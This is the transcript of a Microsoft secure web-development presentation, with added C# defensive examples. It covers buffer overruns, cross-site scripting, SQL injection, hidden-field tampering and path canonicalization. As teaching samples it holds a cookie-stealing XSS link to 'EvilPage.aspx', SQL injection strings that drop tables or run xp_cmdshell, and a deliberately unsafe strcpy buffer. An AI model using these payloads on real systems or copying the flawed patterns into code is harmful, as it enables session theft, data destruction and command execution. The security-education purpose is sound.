
Managing Risk: Application Development Principles and Best Practices

Managing Risk: Application Development Principles and Best Practices. Dave Glover Microsoft Pty Ltd http://blogs.msdn.com/dglover. The Gartner Group states:


Presentation Transcript


  1. Managing Risk: Application Development Principles and Best Practices Dave Glover Microsoft Pty Ltd http://blogs.msdn.com/dglover

  2. The Gartner Group states: "Today over 70% of attacks against a company's Web site or Web application come at the 'Application Layer' not the Network or System layer."

  3. Agenda
     • Buffer Overruns
     • Arithmetic Errors
     • Cross-site Scripting
     • SQL Injection
     • Cryptography Weaknesses
     • Hidden Field Tampering
     • Canonicalization Issues
     • Web Services Security
     • The Others…
     • … And Finally


  5. Buffer Overruns
     • Occurs when data exceeds the expected size and overwrites other values
     • Exists primarily in unmanaged C/C++ code
     • Includes four types:
       • Stack-based
       • Heap overruns
       • V-table and function pointer overwrites
       • Exception handler overwrites
     • Can be exploited by worms and can result in:
       • Access Violation (Denial of Service)
       • Instability
       • Code Injection

  6. How Stack-Based Buffer Overruns Work
     #include <string.h>

     /* Deliberately unsafe, as on the slide: strcpy copies the whole source
        string into a 10-byte stack buffer with no bounds check, so a longer
        string overwrites whatever sits next to the buffer on the stack. */
     void flawed(char *str)
     {
         char buffer[10];
         strcpy(buffer, str);
     }

     int main(void)
     {
         flawed("This string is too long");
         return 0;
     }

  7. Defending Against Buffer Overruns
     • Deprecated and should be avoided…
       • strcpy, strncpy, CopyMemory, MultiByteToWideChar, …
     • Use strsafe.h for safer buffer handling
     • Use the /GS compile option in Visual C++ .NET
     • Check all array indexes
     • Use recognized file-path processing methods, such as _splitpath (C runtime)
     • Use managed code
       • But pay attention to PInvoke and COM Interop


  9. Arithmetic Errors
     • Occur when the limitations of a variable are exceeded
     • Lead to serious runtime issues
     • Are often overlooked and underestimated
     • Include:
       • Overflow – value too large for data type
       • Underflow – value too small for data type

  10. Arithmetic Overflow
      • CalEngine
      • Purchase.aspx
      • GoodPurchase.aspx

  11. Defending Against Arithmetic Errors
      • Understand the limitations
      • Unit test boundary conditions
      • Consider limitations of data types
      • Consider writing safe, reusable functions
      • Consider using a safe template class (if coding in C++)
      • Use languages that support overflow checking – VB.NET and C#!!
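As an added example (not code from the presentation) of the overflow checking the slide recommends, the following C# computes an order total first with unchecked arithmetic, which silently wraps, and then inside a checked block, which throws OverflowException and lets the caller fail closed. The class and method names are hypothetical.

```csharp
using System;

// Added example: guarding an order total against Int32 overflow.
// SafeOrderTotal and its methods are hypothetical names.
public static class SafeOrderTotal
{
    // Unchecked (the C# default): 2000000 * 2000 = 4000000000 does not fit in
    // an Int32, so the product wraps around to a negative number and a
    // purchase could be recorded with a nonsensical total.
    public static int UncheckedTotal(int quantity, int unitPriceCents)
    {
        return unchecked(quantity * unitPriceCents);
    }

    // Checked: the same multiplication throws OverflowException, which is
    // turned into a "no total" result instead of a wrong total.
    public static bool TryComputeTotal(int quantity, int unitPriceCents, out int totalCents)
    {
        totalCents = 0;

        // Reject values the business rules never allow before doing arithmetic;
        // negative quantities are the usual route to an "underflow" total.
        if (quantity <= 0 || unitPriceCents < 0)
            return false;

        try
        {
            totalCents = checked(quantity * unitPriceCents);
            return true;
        }
        catch (OverflowException)
        {
            return false;   // fail closed: no total, no purchase
        }
    }

    public static void Main()
    {
        Console.WriteLine(UncheckedTotal(2000000, 2000));          // -294967296 (wrapped)

        int total;
        Console.WriteLine(TryComputeTotal(2000000, 2000, out total)); // False
        Console.WriteLine(TryComputeTotal(3, 1999, out total));       // True
        Console.WriteLine(total);                                     // 5997
    }
}
```

The `checked` keyword turns checking on for one expression or block; the C# compiler's `-checked` option does the same for a whole project, which is the simplest way to make the "boundary condition" unit tests on the slide fail loudly instead of passing with a wrapped value.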


  13. Cross-Site Scripting
      • Malicious script is sent to a Web application as input
      • Echoed back to a user's browser, where it is executed
      • Targets your users; your application is the vehicle
      • Attacks are via carefully crafted hyperlinks
      • Allows hackers to:
        • Execute malicious script in a client's Web browser
        • Insert <script>, <object>, <applet>, <form>, and <embed> tags
        • Steal Web session information and cookies (inc. authentication)
        • Access the client computer's resources

  14. How Cross-Site Scripting Works
      URL points to the site that the hacker wants to attack:
        <a href="http://…/Search.aspx?Search=<script language='javascript'>
           document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);
        </script>">…</a>
      Query string contains embedded JavaScript that redirects to the hacker's page and transmits any cookies issued by Search.aspx in a query string

  15. What Is a One-Click Attack
      • Site offers persistent sign-in option (cookies)
      • Victim user navigates to (or opens) an HTML page – perhaps a "once in a lifetime offer"
      • One or more actions are carried out using the trust of the victim user, completely unsuspected by that user

  16. Cross Site Script Attacks
      • Search.aspx
      • Review.aspx
      • AntiXSS Library
      • Secure Controls
      • GoodSearch.aspx
      • Validation Controls
      • Secure Frames
      • One Click Attack

  17. Defending Against Cross-Site Scripting Attacks
      • Do not
        • Trust user input
        • Echo client-supplied data without encoding
        • Store secret information in cookies
      • Do
        • Take advantage of ASP.NET's validateRequest
        • Take advantage of ASP.NET's ViewStateUserKey
        • Consider AntiXSS for data encoding
        • Use the HttpOnly cookie option
        • Use the <frame> security attribute
        • Implement secure custom controls

  18. Defending Against XSS
      • Input validation – first line of defense
        • OK: principle of exclusions, or black-listing
        • Better: principle of inclusions, or white-listing
      • Output encoding
        • Platform features: Server.HtmlEncode()
        • Use Anti-XSS
      Context: non-persistent XSS. The product search feature of WIDGETCO displays the 'searchstring' input without sanitizing or encoding.
      Bad code:
        someLabel.Text = "Results for " + searchstring + ":";
      Mitigation using Anti-XSS:
        someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";
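The two defenses on this slide, white-list input validation and output encoding, as an added C# example that is not part of the presentation. It uses the framework's System.Net.WebUtility.HtmlEncode in place of the slide's AntiXSS call (which is not in the example); the class, method names and the allowed-character rule are hypothetical choices for a product search box.

```csharp
using System;
using System.Net;
using System.Text.RegularExpressions;

// Added example: validating a search string by inclusion and encoding it
// before it is placed in HTML. Names are hypothetical.
public static class SearchResultsRendering
{
    // Principle of inclusions: only letters, digits, spaces and a few
    // punctuation characters, 1 to 64 of them. Everything else is rejected,
    // so there is no list of "bad" characters to keep up to date.
    private static readonly Regex AllowedSearch = new Regex(@"^[A-Za-z0-9 \-_.]{1,64}$");

    public static bool IsValidSearchString(string s)
    {
        return s != null && AllowedSearch.IsMatch(s);
    }

    // The flawed pattern from the slide: the input lands in the page as markup.
    public static string RenderUnsafe(string searchString)
    {
        return "Results for " + searchString + ":";
    }

    // Output encoding: < > & " ' become entities, so the browser displays the
    // text instead of parsing it as tags or script.
    public static string RenderEncoded(string searchString)
    {
        return "Results for " + WebUtility.HtmlEncode(searchString) + ":";
    }

    public static void Main()
    {
        string hostile = "<script>alert(1)</script>";   // constructed test input
        Console.WriteLine(IsValidSearchString(hostile));       // False: rejected at the input stage
        Console.WriteLine(IsValidSearchString("blue widget"));  // True
        Console.WriteLine(RenderUnsafe(hostile));               // markup reaches the page intact
        Console.WriteLine(RenderEncoded(hostile));              // Results for &lt;script&gt;alert(1)&lt;/script&gt;:
    }
}
```

Validation and encoding are not alternatives: validation narrows what the application accepts, while encoding protects the page even when a value arrives by a route the validator never saw (a database field, a cookie, a query string built elsewhere). Encoding must match the output context; HtmlEncode is correct for element text, not for a JavaScript string or a URL.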

  19. Defending Against One-Click Attack
      • Browser's cross-frame security limits this to a "write-only" attack
      • Concept for defense: require a data element in the request which the attacker can't supply
        • Check the Referrer field
        • In .NET 1.1 use ViewStateUserKey:
          protected override void OnInit(EventArgs e)
          {
              // ...
              // Tie the ViewState MAC to the signed-in user, so a request
              // prepared for a different identity fails ViewState validation
              ViewStateUserKey = User.Identity.Name;
              // ...
          }


  21. SQL Injection
      • Adds SQL statements to user input to:
        • Probe databases, execute multiple SQL statements
        • Bypass authorization
        • Call built-in stored procedures
      • Exploits applications that don't validate input
        • Input from <form> fields, query strings, cookies

  22. How SQL Injection Works
      Model Query
        SELECT COUNT(*) FROM Users WHERE UserName='Jeff' AND Password='imbatman'
      Malicious Query
        SELECT COUNT(*) FROM Users WHERE UserName='' or 1=1-- AND Password=''
      • "or 1=1" matches every record in the table
      • "--" comments out the remainder of the query

  23. Examples Of SQL Injection
      • If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following
        • ALFKI1001
        • ALFKI1001' or 1=1 --
        • ALFKI1001'; DROP TABLE OrderDetail --
        • ALFKI1001'; exec xp_cmdshell('fdisk.exe') --
      sqlString = String.Format("select count(*) from customers where username='{0}' and password='{1}'", userName, password);

  24. SQL Injection Attack
      • Login Attack
      • Search Page Attack
      • SQL Cmd Shell Attack

  25. Defending Against SQL Injection
      • Code against SQL injection attacks
        • Sanitize all input
        • Don't use dynamic SQL commands
        • Use secured stored procedures or parameterized commands
      • Run with least privilege
        • Never execute as "sa"
        • Restrict access to built-in stored procedures
      • Store connection strings securely
        • Integrated Security is better
        • Encrypt the Web.config connections section
          • DPAPI or Configuration Application Block
      • Do not echo database errors (fail intelligently)
      • Apply administrative protections to SQL Server
        http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
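The parameterized-command and stored-procedure alternatives to the String.Format query on the earlier slide, plus an integrated-security connection string, as an added C# example that is not from the presentation. It uses System.Data.SqlClient; the class name, the customers table columns and the procedure name usp_CheckLogin are hypothetical.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example: the dynamic-SQL pattern from the slides beside a
// parameterized command and a stored-procedure call. LoginQueries,
// usp_CheckLogin and the column names are hypothetical.
public static class LoginQueries
{
    // Flawed pattern: the input becomes part of the SQL text, so a user name
    // such as  ' or 1=1 --  rewrites the statement itself.
    public static string BuildDynamicSql(string userName, string password)
    {
        return string.Format(
            "select count(*) from customers where username='{0}' and password='{1}'",
            userName, password);
    }

    // Parameterized command: the statement text is fixed and the input travels
    // to the server as typed parameter values, so it is only ever compared as data.
    public static SqlCommand BuildParameterizedCommand(SqlConnection conn, string userName, string password)
    {
        var cmd = new SqlCommand(
            "select count(*) from customers where username=@username and password=@password", conn);
        cmd.Parameters.Add("@username", SqlDbType.NVarChar, 50).Value = userName;
        cmd.Parameters.Add("@password", SqlDbType.NVarChar, 50).Value = password;
        return cmd;
    }

    // Stored-procedure variant: same parameters, with the query kept on the
    // server where EXECUTE on the procedure can be granted instead of SELECT on the table.
    public static SqlCommand BuildStoredProcCommand(SqlConnection conn, string userName, string password)
    {
        var cmd = new SqlCommand("usp_CheckLogin", conn) { CommandType = CommandType.StoredProcedure };
        cmd.Parameters.Add("@username", SqlDbType.NVarChar, 50).Value = userName;
        cmd.Parameters.Add("@password", SqlDbType.NVarChar, 50).Value = password;
        return cmd;
    }

    // Integrated security: no password in the connection string, and the
    // application's own Windows account (not "sa") is what SQL Server authorizes.
    public static string BuildIntegratedConnectionString(string server, string database)
    {
        var b = new SqlConnectionStringBuilder
        {
            DataSource = server,
            InitialCatalog = database,
            IntegratedSecurity = true
        };
        return b.ConnectionString;
    }

    public static int CountMatches(string connectionString, string userName, string password)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = BuildParameterizedCommand(conn, userName, password))
        {
            conn.Open();
            return (int)cmd.ExecuteScalar();
        }
    }

    public static void Main()
    {
        // Shows what reaches the server in each case; no database is needed for this part.
        string hostile = "' or 1=1 --";
        Console.WriteLine(BuildDynamicSql(hostile, ""));
        var cmd = BuildParameterizedCommand(new SqlConnection(), hostile, "");
        Console.WriteLine(cmd.CommandText);
        foreach (SqlParameter p in cmd.Parameters)
            Console.WriteLine(p.ParameterName + " = " + p.Value);
        Console.WriteLine(BuildIntegratedConnectionString(".", "Shop"));
    }
}
```

The query keeps the slide's plaintext password comparison only so that the two forms line up; a real login table stores a password hash and compares against that. Parameterization removes the injection, and least privilege on the connecting account limits what an injection elsewhere in the code base could do.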


  27. Cryptography Weaknesses
      [Diagram: Key, Plaintext, Algorithm, Ciphertext. Caption: I need three of the above to decrypt your data!]
      • Inappropriate use of algorithms
        • Creating your own
        • Using weak ones
        • Incorrect application
      • Failure to keep keys secure
        • Insecure storage
        • Extensive duration of use
      • The human factor
        • Accidental release of private keys

  28. Defending Against Cryptography Weaknesses
      • Recycle keys periodically
      • Use ACLs to restrict access to keys
      • Store keys on an external device
      • Use larger keys to provide increased security
      • Use DPAPI to simplify key management, if possible
      • Do not implement your own cryptographic routines
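An added C# example (not from the presentation) of the DPAPI and "don't roll your own" advice: a random AES key is generated by the framework, wrapped with System.Security.Cryptography.ProtectedData before it is written to disk, and used through the standard Aes class. The class and method names, the entropy string and the file name are hypothetical or constructed.

```csharp
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

// Added example: keeping a symmetric key out of source and configuration by
// wrapping it with DPAPI. ProtectedKeyStore and its members are hypothetical.
public static class ProtectedKeyStore
{
    // Optional entropy mixed into the DPAPI secret, so another process under
    // the same account cannot unwrap the blob without it. Constructed sample value.
    private static readonly byte[] AppEntropy = Encoding.UTF8.GetBytes("constructed-app-entropy");

    // A random 256-bit key from the framework, never a developer-chosen string.
    public static byte[] NewAesKey()
    {
        using (var aes = Aes.Create())
        {
            aes.KeySize = 256;
            aes.GenerateKey();
            return aes.Key;
        }
    }

    // Wrap the key under the current user's DPAPI secret and store the opaque
    // blob. The file's ACL should still be limited to the service account.
    public static void SaveKey(string path, byte[] key)
    {
        byte[] blob = ProtectedData.Protect(key, AppEntropy, DataProtectionScope.CurrentUser);
        File.WriteAllBytes(path, blob);
    }

    // Unwrapping only succeeds for the account (and machine) that protected
    // the blob, so a copy of the file elsewhere yields nothing usable.
    public static byte[] LoadKey(string path)
    {
        byte[] blob = File.ReadAllBytes(path);
        return ProtectedData.Unprotect(blob, AppEntropy, DataProtectionScope.CurrentUser);
    }

    // AES-CBC with a fresh random IV per message; the IV is prefixed to the
    // ciphertext so the receiver can recover it.
    public static byte[] Encrypt(byte[] key, byte[] plaintext)
    {
        using (var aes = Aes.Create())
        {
            aes.Key = key;
            aes.GenerateIV();
            using (var encryptor = aes.CreateEncryptor())
            {
                byte[] body = encryptor.TransformFinalBlock(plaintext, 0, plaintext.Length);
                byte[] output = new byte[aes.IV.Length + body.Length];
                Buffer.BlockCopy(aes.IV, 0, output, 0, aes.IV.Length);
                Buffer.BlockCopy(body, 0, output, aes.IV.Length, body.Length);
                return output;
            }
        }
    }

    public static byte[] Decrypt(byte[] key, byte[] ivAndCiphertext)
    {
        using (var aes = Aes.Create())
        {
            aes.Key = key;
            byte[] iv = new byte[aes.BlockSize / 8];
            Buffer.BlockCopy(ivAndCiphertext, 0, iv, 0, iv.Length);
            aes.IV = iv;
            using (var decryptor = aes.CreateDecryptor())
            {
                return decryptor.TransformFinalBlock(ivAndCiphertext, iv.Length, ivAndCiphertext.Length - iv.Length);
            }
        }
    }

    public static void Main()
    {
        string keyFile = Path.Combine(Path.GetTempPath(), "sample-aes-key.dpapi");   // constructed path
        SaveKey(keyFile, NewAesKey());
        byte[] key = LoadKey(keyFile);
        byte[] ct = Encrypt(key, Encoding.UTF8.GetBytes("constructed sample secret"));
        Console.WriteLine(Encoding.UTF8.GetString(Decrypt(key, ct)));   // round-trips the sample text
    }
}
```

Two things the slide's list implies but this block leaves to the caller: CBC gives confidentiality only, so an integrity check (an HMAC over IV plus ciphertext, or an authenticated mode such as AES-GCM on newer frameworks) belongs on top of it, and periodic key recycling is easier if each stored blob carries a key identifier so old data can be re-encrypted under the new key.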


  30. Hidden-Field Tampering
      • Exploits applications that persist data between requests by round-tripping it in hidden <input> fields
      • The technique
        • Look for <input type="hidden" … > tags
        • Submit bogus requests with modified value attributes to spoof a Web server

  31. How Hidden-Field Tampering Works
      Page contains this…
        <input type="hidden" id="price" value="10000.00">
      Postback data should contain this…
        price="10000.00"
      Instead it contains this…
        price="1.00"
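An added C# example (not part of the presentation) of detecting the tampering shown above: when a value such as the price has to be round-tripped, the server emits an HMAC over the field name and value alongside it and recomputes the HMAC on postback, so the changed "1.00" is rejected. The class and method names are hypothetical and the key is a constructed sample.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

// Added example: authenticating a round-tripped hidden field with HMAC-SHA256.
// TamperProofHiddenField and its members are hypothetical names.
public static class TamperProofHiddenField
{
    // Server-only secret. In a deployment it comes from protected
    // configuration; it never appears in the page. Constructed sample value.
    private static readonly byte[] ServerKey =
        Encoding.UTF8.GetBytes("constructed-sample-key-replace-me");

    // MAC over name and value together, so a MAC issued for one field cannot
    // be reused on another. The page renders the value and this MAC as two
    // hidden inputs, e.g. price="10000.00" and price_mac="<base64>".
    public static string Sign(string fieldName, string value)
    {
        using (var hmac = new HMACSHA256(ServerKey))
        {
            byte[] mac = hmac.ComputeHash(Encoding.UTF8.GetBytes(fieldName + "\n" + (value ?? "")));
            return Convert.ToBase64String(mac);
        }
    }

    // On postback, recompute the MAC for the presented value and compare in
    // constant time, so response timing does not reveal how many bytes matched.
    public static bool Verify(string fieldName, string value, string presentedMac)
    {
        byte[] expected = Convert.FromBase64String(Sign(fieldName, value));
        byte[] presented;
        try { presented = Convert.FromBase64String(presentedMac ?? ""); }
        catch (FormatException) { return false; }

        if (presented.Length != expected.Length) return false;
        int diff = 0;
        for (int i = 0; i < expected.Length; i++) diff |= expected[i] ^ presented[i];
        return diff == 0;
    }

    public static void Main()
    {
        string mac = Sign("price", "10000.00");
        Console.WriteLine(Verify("price", "10000.00", mac));     // True: value untouched
        Console.WriteLine(Verify("price", "1.00", mac));         // False: value changed, MAC no longer matches
        Console.WriteLine(Verify("discount", "10000.00", mac));  // False: MAC moved to another field
    }
}
```

The stronger fix is to not round-trip the price at all: post back only the product identifier and look the price up on the server. The MAC is for values that genuinely must travel with the form; ASP.NET's ViewState MAC (enableViewStateMac) applies the same idea to ViewState, and the ViewStateUserKey slide above binds that MAC to the signed-in user.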


  33. Canonicalization Issues
      • There is usually more than one way to name something
      • Alternate representations exist for:
        • File names
        • URLs
        • Devices (such as printers)
      • Hackers may exploit code that makes decisions based on file names or URLs

  34. Canonicalization Issues – Example 1: File Names

  35. Defending Against Canonicalization Issues
      • Use file-system security to restrict access to private data
      • Never make a decision based on a name
      • Disable the IIS Parent Paths setting
      • Encrypt Web.config sections
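An added C# example (not from the presentation) of "never make a decision based on a name": the client-supplied file name is resolved to its canonical full path with Path.GetFullPath and the access decision is made on that path, which must lie under the allowed root; reserved Windows device names are rejected separately. The class and method names and the sample root directory are hypothetical.

```csharp
using System;
using System.IO;

// Added example: canonicalize first, decide afterwards.
// SafeFileAccess and its members are hypothetical names.
public static class SafeFileAccess
{
    // Device names that can be reached through ordinary-looking file names,
    // with or without an extension (e.g. "nul.gif").
    private static readonly string[] ReservedNames =
    {
        "CON", "PRN", "AUX", "NUL",
        "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
        "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9"
    };

    public static bool IsReservedDeviceName(string name)
    {
        string stem = Path.GetFileNameWithoutExtension(name ?? "");
        foreach (string r in ReservedNames)
            if (string.Equals(stem, r, StringComparison.OrdinalIgnoreCase))
                return true;
        return false;
    }

    // Returns true, and the canonical full path, only if the requested name
    // resolves to a location underneath 'root'. "..\", forward slashes,
    // absolute paths and mixed case are all handled by resolving first and
    // comparing the resolved string, not the name the client typed.
    public static bool TryResolveUnderRoot(string root, string requestedName, out string fullPath)
    {
        fullPath = null;
        if (string.IsNullOrWhiteSpace(requestedName)) return false;
        if (IsReservedDeviceName(requestedName)) return false;

        // Canonical root with a trailing separator, so "C:\site\images"
        // does not accidentally match "C:\site\images2\...".
        string canonicalRoot = Path.GetFullPath(root);
        if (!canonicalRoot.EndsWith(Path.DirectorySeparatorChar.ToString()))
            canonicalRoot += Path.DirectorySeparatorChar;

        string candidate;
        try
        {
            // Path.Combine returns the second argument unchanged when it is
            // already rooted, so an absolute path falls to the prefix check below.
            candidate = Path.GetFullPath(Path.Combine(canonicalRoot, requestedName));
        }
        catch (ArgumentException) { return false; }       // illegal characters
        catch (NotSupportedException) { return false; }   // e.g. a stray colon
        catch (PathTooLongException) { return false; }

        // Windows file names are case-insensitive, so the comparison must be too.
        if (!candidate.StartsWith(canonicalRoot, StringComparison.OrdinalIgnoreCase))
            return false;

        fullPath = candidate;
        return true;
    }

    public static void Main()
    {
        string root = @"C:\inetpub\wwwroot\images";   // constructed sample root
        string resolved;
        Console.WriteLine(TryResolveUnderRoot(root, "logo.gif", out resolved) + " " + resolved); // True C:\inetpub\wwwroot\images\logo.gif
        Console.WriteLine(TryResolveUnderRoot(root, @"..\web.config", out resolved));            // False: escapes the root
        Console.WriteLine(TryResolveUnderRoot(root, @"C:\Windows\win.ini", out resolved));        // False: absolute path outside the root
        Console.WriteLine(TryResolveUnderRoot(root, "nul.gif", out resolved));                    // False: device name
    }
}
```

This check complements the slide's first bullet rather than replacing it: the NTFS ACL on the private files is the backstop if the application's own containment logic is ever bypassed.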

  36. Encrypting Web.config sections
      • aspnet_regiis -pc "SampleKeys" -exp          (create the RSA key container; -exp makes it exportable)
      • aspnet_regiis -pa "SampleKeys" "domain\acct"  (grant the application's account access to the container)
      • aspnet_regiis -pef connectionStrings .       (encrypt the connectionStrings section of the Web.config in the current directory)
      • aspnet_regiis -pdf connectionStrings .       (decrypt it again)
      • Web.config
        <configProtectedData defaultProvider="SampleProvider">
          <providers>
            <add name="SampleProvider"
                 type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL"
                 keyContainerName="SampleKeys"
                 useMachineContainer="true" />
          </providers>
        </configProtectedData>

  37. Traversal Attacks
      • PathTraversal.htm
      • ViewImage.aspx
      • GoodProducts.aspx
      • Web.Config Encryption

  38. Next Steps
      • Stay informed about security
        • Microsoft Developers Network Security Center
          http://msdn.microsoft.com/security/
        • Microsoft Security Guidance
          http://www.microsoft.com/security/guidance/
      • Get additional security training
        • Find online and in-person training seminars:
          http://www.microsoft.com/seminar/events/security/
      • Read the book: Writing Secure Code
        • Michael Howard and David LeBlanc
        • ISBN: 0-7356-1722-8

  39. Defending Against the Others
      • Improving Web Application Security: Threats and Countermeasures
        http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp

  40. Security seminar follow up…
      • Security e-forum site: www.microsoft.com.au/eforum
        • View on-demand web casts of all presentations from this event (tell your work colleagues!)
        • Online live chats
          • Have a live chat with the Microsoft security experts you'll see today. Check the e-forum site for the live chat schedule.
        • Plus lots more…
      • Evaluation forms – we value your feedback!
        • Need help with your business' security?
          • Q7 – register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your security challenges
        • Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360
